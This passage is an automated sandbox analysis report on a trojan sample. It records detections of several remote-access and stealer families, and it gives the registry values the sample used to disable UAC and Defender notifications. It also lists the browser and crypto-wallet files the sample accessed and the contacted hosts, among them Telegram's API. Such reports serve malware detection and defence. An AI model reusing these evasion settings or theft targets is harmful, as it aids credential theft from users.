Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Disable UAC(promptonsecuredesktop)

Source: C:\Users\user\AppData\Roaming\Loaader.exe

Registry value created: promptonsecuredesktop 0

Disable Windows Defender notifications (registry)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration

Registry value created: Notification_Suppress 1

Disables UAC (registry)

Source: C:\Users\user\AppData\Roaming\Loaader.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System enablelua

AV process strings found (often used to terminate AV products)

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr	Binary or memory string: MSASCui.exe
Source: Amcache.hve.30.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.30.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.30.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr	Binary or memory string: procexp.exe
Source: Loaader.exe, 00000015.00000002.3522971860.000000001B940000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3532252741.000000001BBEC000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3526000868.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3549502589.000000001BCF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Amcache.hve.30.dr, Loaader.exe.3.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected BrowserPasswordDump

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Yara detected DcRat

Source: Yara match	File source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore
Source: Loader.exe, 00000014.00000002.2527964251.00000000029E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Yara detected DcRat

Source: Yara match	File source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
104.21.44.66	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
64.185.227.155	api64.ipify.org	United States	18450	WEBNXUS	false
66.235.168.242	unknown	United States	397423	TIER-NETUS	true

Contacted Domains

Name	IP	Active
ip-api.com	208.95.112.1	true
api.mylnikov.org	104.21.44.66	true
api.telegram.org	149.154.167.220	true
api64.ipify.org	64.185.227.155	true
windowsupdatebg.s.llnwi.net	87.248.204.0	true
icanhazip.com	104.16.185.241	true
81.189.14.0.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api64.ipify.org/	false	Avira URL Cloud: safe	unknown
http://icanhazip.com/	false	URL Reputation: safe	unknown
